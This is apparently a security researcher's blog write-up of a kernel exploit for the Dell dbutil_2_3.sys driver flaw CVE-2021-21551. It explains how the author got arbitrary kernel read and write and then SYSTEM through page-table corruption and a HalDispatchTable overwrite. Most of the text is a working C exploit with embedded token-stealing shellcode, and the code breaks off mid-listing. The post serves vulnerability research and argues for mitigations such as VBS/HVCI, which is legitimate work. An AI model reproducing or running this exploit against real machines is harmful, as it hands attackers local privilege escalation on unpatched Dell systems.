Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

33 minute read

Introduction

Recently I said I was going to focus on browser exploitation with Advanced Windows Exploitation being canceled. With this cancellation, I found myself craving a binary exploitation training, with AWE now being canceled for the previous two years. I found myself enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest, due to the cancellation. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month, and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Staoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr on the vulnerability is there is an IOCTL code that any client can trigger with a call to DeviceIoControl that eventually reaches a memmove routine, in which the user-supplied buffer from the vulnerable IOCTL routine is used in this call.

Let’s get started with the analysis. As is accustom in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with the driver. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it, that allows clients to interact with the driver. This object is what clients interact with. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument, and allow us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t fool proof, is looking for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs and drivers, especially enterprise grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction incurs, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub+15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sup rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and essentially an NTSTATUS code is returned back to the client of 0xC0000000D, which means STATUS_INVALID_PARAMETER. This is the driver’s way to let the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will at least need to send 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_5294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr[rsp+0x30], which will move the lower 32-bits of RSP, ESP, into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts a pointer to memory. Since we passed raw values of junk, these addresses are invalid. Because of this, let’s switch up our POC a bit again in order to see if we can’t get a desired result. Let’s use KUSER_SHARD_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20 byte buffer. Kasif points out that the memmove routine, before reaching the call, will select at an offset of 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, 0x42 bytes, 4 bytes of them to be exact, will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue is, however, with the source address. We were attempting to target 0xFFFFF78000000800. However, our address got mangled into 0xFFFFF78042424242. This is because it seems like the lower 32-bits of one of our user-supplied QWORDS first gets added to the destination buffer. This time, if we resend the exploit and we change where 0x4242424242424242 once was with 0x0000000000000000, we can “bypass” this issue, but having a value of 0 added, meaning our target address will remain unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where do we write the data). However, recall the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means, at some point between the memmove call and our invocation of DeviceIoControl, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass to the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998 43434343`43434343

What if we could just pass our own data as such:

43434343`43434343 DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmmove data writes it to the output buffer.

The latter option makes sense as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components/legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely it is expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially to the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more of reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could setup our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instruction, we can see our input buffer for the read primitive is being propagated and setup for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element will contain the dereferenced contents of the value we would like to read from! Now that we have a vanilla 1 QWORD arbitrary read/write primitive, we can now get into out exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate where the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know where we want to write to is at an offset of 0x3000 (offset to .data.) + 0x10 (offset to code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which already is a kernel-mode page and is writable (you could use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation of Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The Windows API function nt!MiGetPteAddress, at an offset of 0x13, contains, dynamically, the base of the page table entries as this kernel mode function is leveraged to find the base of the page table entries.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer to nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, which will trigger a call to this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of ntKeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a “valid target”, meaning at compile time, when the bitmap was created, did the address exist and is it apart of any valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
{
  // Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;
  int drivers;
  char lpFileName[1024];
  unsigned long long imageBase;

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
  if (!baseofDrivers)
  {
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // Defining number of drivers for GetDeviceDriverBaseNameA()
  drivers = lpcbNeeded / sizeof(lpImageBase[0]);

  // Parsing loaded drivers
  for (int i = 0; i < drivers; i++)
  {
    GetDeviceDriverBaseNameA(
      lpImageBase[i],
      lpFileName,
      sizeof(lpFileName) / sizeof(char)
    );

    // Keep looping, until found, to find user supplied driver base address
    if (!strcmp(name, lpFileName))
    {
      imageBase = (unsigned long long)lpImageBase[i];

      // Exit loop
      break;
    }
  }

  return imageBase;
}


void exploitWork(void)
{
  // Store the base of the kernel
  unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

  // Storing the base of the driver
  unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

  // Print updates
  printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
  printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

  // Store nt!MiGetPteAddress+0x13
  unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

  // Obtain a handle to the driver
  HANDLE driverHandle = CreateFileA(
    "\\\\.\\DBUtil_2_3",
    FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (driverHandle == INVALID_HANDLE_VALUE)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

    // Buffer to send to the driver (read primitive)
    unsigned long long inBuf1[4];

    // Values to send
    unsigned long long one1 = 0x4141414141414141;
    unsigned long long two1 = ntmigetpteAddress;
    unsigned long long three1 = 0x0000000000000000;
    unsigned long long four1 = 0x0000000000000000;

    // Assign the values
    inBuf1[0] = one1;
    inBuf1[1] = two1;
    inBuf1[2] = three1;
    inBuf1[3] = four1;

    // Interact with the driver
    DWORD bytesReturned1 = 0;

    BOOL interact = DeviceIoControl(
      driverHandle,
      IOCTL_READ_CODE,
      &inBuf1,
      sizeof(inBuf1),
      &inBuf1,
      sizeof(inBuf1),
      &bytesReturned1,
      NULL
    );

    // Error handling
    if (!interact)
    {
      printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
      exit(-1);
    }
    else
    {
      // Last member of read array should contain base of the PTEs
      unsigned long long pteBase = inBuf1[3];

      printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

      // .data section of dbutil_2_3.sys contains a code cave
      unsigned long long shellcodeLocation = driverBase + 0x3010;

      // Bitwise operations to locate PTE of shellcode page
      unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
      shellcodePte = shellcodePte & 0x7FFFFFFFF8;
      shellcodePte = shellcodePte + pteBase;

      // Print update
      printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

      // Buffer to send to the driver (read primitive)
      unsigned long long inBuf2[4];

      // Values to send
      unsigned long long one2 = 0x4141414141414141;
      unsigned long long two2 = shellcodePte;
      unsigned long long three2 = 0x0000000000000000;
      unsigned long long four2 = 0x0000000000000000;

      inBuf2[0] = one2;
      inBuf2[1] = two2;
      inBuf2[2] = three2;
      inBuf2[3] = four2;

      // Parameter for DeviceIoControl
      DWORD bytesReturned2 = 0;

      BOOL interact1 = DeviceIoControl(
        driverHandle,
        IOCTL_READ_CODE,
        &inBuf2,
        sizeof(inBuf2),
        &inBuf2,
        sizeof(inBuf2),
        &bytesReturned2,
        NULL
      );

      // Error handling
      if (!interact1)
      {
        printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
      else
      {
        // Last member of read array should contain PTE bits
        unsigned long long pteBits = inBuf2[3];

        printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

        /*
          ; Windows 10 1903 x64 Token Stealing Payload
          ; Author Connor McGarr

          [BITS 64]

          _start:
            mov rax, [gs:0x188]     ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]   ; Current process (_EPROCESS)
            mov rbx, rax        ; Copy current process (_EPROCESS) to rbx
          __loop:
            mov rbx, [rbx + 0x2f0]    ; ActiveProcessLinks
            sub rbx, 0x2f0          ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x2e8]    ; UniqueProcessId (PID)
            cmp rcx, 4          ; Compare PID to SYSTEM PID
            jnz __loop            ; Loop until SYSTEM PID is found

            mov rcx, [rbx + 0x360]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x360], rcx    ; Copy SYSTEM token to current process

            xor rax, rax        ; set NTSTATUS STATUS_SUCCESS
            ret             ; Done!

        */

        // One QWORD arbitrary write
        // Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
        unsigned long long shellcode1 = 0x00018825048B4865;
        unsigned long long shellcode2 = 0x000000B8808B4800;
        unsigned long long shellcode3 = 0x02F09B8B48C38948;
        unsigned long long shellcode4 = 0x0002F0EB81480000;
        unsigned long long shellcode5 = 0x000002E88B8B4800;
        unsigned long long shellcode6 = 0x8B48E57504F98348;
        unsigned long long shellcode7 = 0xF0E180000003608B;
        unsigned long long shellcode8 = 0x4800000360888948;
        unsigned long long shellcode9 = 0x0000000000C3C031;

        // Buffers to send to the driver (write primitive)
        unsigned long long inBuf3[4];
        unsigned long long inBuf4[4];
        unsigned long long inBuf5[4];
        unsigned long long inBuf6[4];
        unsigned long long inBuf7[4];
        unsigned long long inBuf8[4];
        unsigned long long inBuf9[4];
        unsigned long long inBuf10[4];
        unsigned long long inBuf11[4];

        // Values to send
        unsigned long long one3 = 0x4141414141414141;
        unsigned long long two3 = shellcodeLocation;
        unsigned long long three3 = 0x0000000000000000;
        unsigned long long four3 = shellcode1;

        unsigned long long one4 = 0x4141414141414141;
        unsigned long long two4 = shellcodeLocation + 0x8;
        unsigned long long three4 = 0x0000000000000000;
        unsigned long long four4 = shellcode2;

        unsigned long long one5 = 0x4141414141414141;
        unsigned long long two5 = shellcodeLocation + 0x10;
        unsigned long long three5 = 0x0000000000000000;
        unsigned long long four5 = shellcode3;

        unsigned long long one6 = 0x4141414141414141;
        unsigned long long two6 = shellcodeLocation + 0x18;
        unsigned long long three6 = 0x0000000000000000;
        unsigned long long four6 = shellcode4;

        unsigned long long one7 = 0x4141414141414141;
        unsigned long long two7 = shellcodeLocation + 0x20;
        unsigned long long three7 = 0x0000000000000000;
        unsigned long long four7 = shellcode5;

        unsigned long long one8 = 0x4141414141414141;
        unsigned long long two8 = shellcodeLocation + 0x28;
        unsigned long long three8 = 0x0000000000000000;
        unsigned long long four8 = shellcode6;

        unsigned long long one9 = 0x4141414141414141;
        unsigned long long two9 = shellcodeLocation + 0x30;
        unsigned long long three9 = 0x0000000000000000;
        unsigned long long four9 = shellcode7;

        unsigned long long one10 = 0x4141414141414141;
        unsigned long long two10 = shellcodeLocation + 0x38;
        unsigned long long three10 = 0x0000000000000000;
        unsigned long long four10 = shellcode8;

        unsigned long long one11 = 0x4141414141414141;
        unsigned long long two11 = shellcodeLocation + 0x40;
        unsigned long long three11 = 0x0000000000000000;
        unsigned long long four11 = shellcode9;

        inBuf3[0] = one3;
        inBuf3[1] = two3;
        inBuf3[2] = three3;
        inBuf3[3] = four3;

        inBuf4[0] = one4;
        inBuf4[1] = two4;
        inBuf4[2] = three4;
        inBuf4[3] = four4;

        inBuf5[0] = one5;
        inBuf5[1] = two5;
        inBuf5[2] = three5;
        inBuf5[3] = four5;

        inBuf6[0] = one6;
        inBuf6[1] = two6;
        inBuf6[2] = three6;
        inBuf6[3] = four6;

        inBuf7[0] = one7;
        inBuf7[1] = two7;
        inBuf7[2] = three7;
        inBuf7[3] = four7;

        inBuf8[0] = one8;
        inBuf8[1] = two8;
        inBuf8[2] = three8;
        inBuf8[3] = four8;

        inBuf9[0] = one9;
        inBuf9[1] = two9;
        inBuf9[2] = three9;
        inBuf9[3] = four9;

        inBuf10[0] = one10;
        inBuf10[1] = two10;
        inBuf10[2] = three10;
        inBuf10[3] = four10;

        inBuf11[0] = one11;
        inBuf11[1] = two11;
        inBuf11[2] = three11;
        inBuf11[3] = four11;

        DWORD bytesReturned3 = 0;
        DWORD bytesReturned4 = 0;
        DWORD bytesReturned5 = 0;
        DWORD bytesReturned6 = 0;
        DWORD bytesReturned7 = 0;
        DWORD bytesReturned8 = 0;
        DWORD bytesReturned9 = 0;
        DWORD bytesReturned10 = 0;
        DWORD bytesReturned11 = 0;

        BOOL interact2 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf3,
          sizeof(inBuf3),
          &inBuf3,
          sizeof(inBuf3),
          &bytesReturned3,
          NULL
        );

        BOOL interact3 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf4,
          sizeof(inBuf4),
          &inBuf4,
          sizeof(inBuf4),
          &bytesReturned4,
          NULL
        );

        BOOL interact4 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf5,
          sizeof(inBuf5),
          &inBuf5,
          sizeof(inBuf5),
          &bytesReturned5,
          NULL
        );

        BOOL interact5 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf6,
          sizeof(inBuf6),
          &inBuf6,
          sizeof(inBuf6),
          &bytesReturned6,
          NULL
        );

        BOOL interact6 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf7,
          sizeof(inBuf7),
          &inBuf7,
          sizeof(inBuf7),
          &bytesReturned7,
          NULL
        );

        BOOL interact7 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf8,
          sizeof(inBuf8),
          &inBuf8,
